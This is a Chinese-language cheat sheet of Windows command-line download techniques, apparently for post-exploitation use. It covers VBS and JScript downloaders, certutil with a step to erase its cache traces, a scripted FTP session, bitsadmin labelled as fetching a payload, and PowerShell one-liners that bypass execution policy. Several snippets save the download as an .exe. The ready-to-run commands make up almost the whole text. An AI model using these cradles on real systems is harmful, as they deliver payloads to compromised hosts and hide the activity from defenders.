1.vbs下载文件
1.执行如下代码echo一个vbs文件
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>downfile.vbs
2.使用vbs脚本下载
cscript downfile.vbs http://www.baidu.com/robots.txt C:\Users\John\Desktop\test.txt
3.非交互式的vbs脚本如下
strFileURL = "http://www.baidu.com/robots.txt" strHDLocation = "c:\\test\\logo.txt" Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing
2.certutil下载文件
1.下载文件
certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt
2.清理痕迹
certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt delete
3.ftp下载文件
echo open 192.168.1.115 21> ftp.txt echo 123>> ftp.txt //user echo 123>> ftp.txt //password echo binary >> ftp.txt //bin模式 echo get robots.txt >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt //下载
4.js下载文件
1.downfile.js文件如下
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile("保存的文件.exe");
2.命令
cscript /nologo downfile.js http://www.baidu.com/robots.txt
5.bitsadmin下载payload
1.windows7 以上版本内置 bitsadmin,用法如下:
bitsadmin /rawreturn /transfer down "https://www.baidu.com/robots.txt" C:\Users\John\Desktop\test666.exe
2.如果下载文件过大配合下面命令提高优先级
bitsadmin /setpriority down foreground
6.powershell文件下载
6.1 powershell脚本文件下载
6.1.1 powershell2版本
1.test.ps1文件如下:
$Urls = @() $Urls += "http://www.baidu.com/robots.txt" $OutPath = "C:\Users\John\Desktop\" ForEach ( $item in $Urls) { $file = $OutPath + ($item).split('/')[-1] (New-Object System.Net.WebClient).DownloadFile($item, $file) }
2.命令
powershell -File test.ps1
6.1.2 powershell3版本
1.down.ps1
文件内容如下
$url = "http://192.168.1.115/robots.txt" $output = "C:\inetpub\robots.txt" $start_time = Get-Date Invoke-WebRequest -Uri $url -OutFile $output Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
2.命令:
powershell down.ps1
6.2 一句话下载
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://www.baidu.com/robots.txt','E:\robots.txt')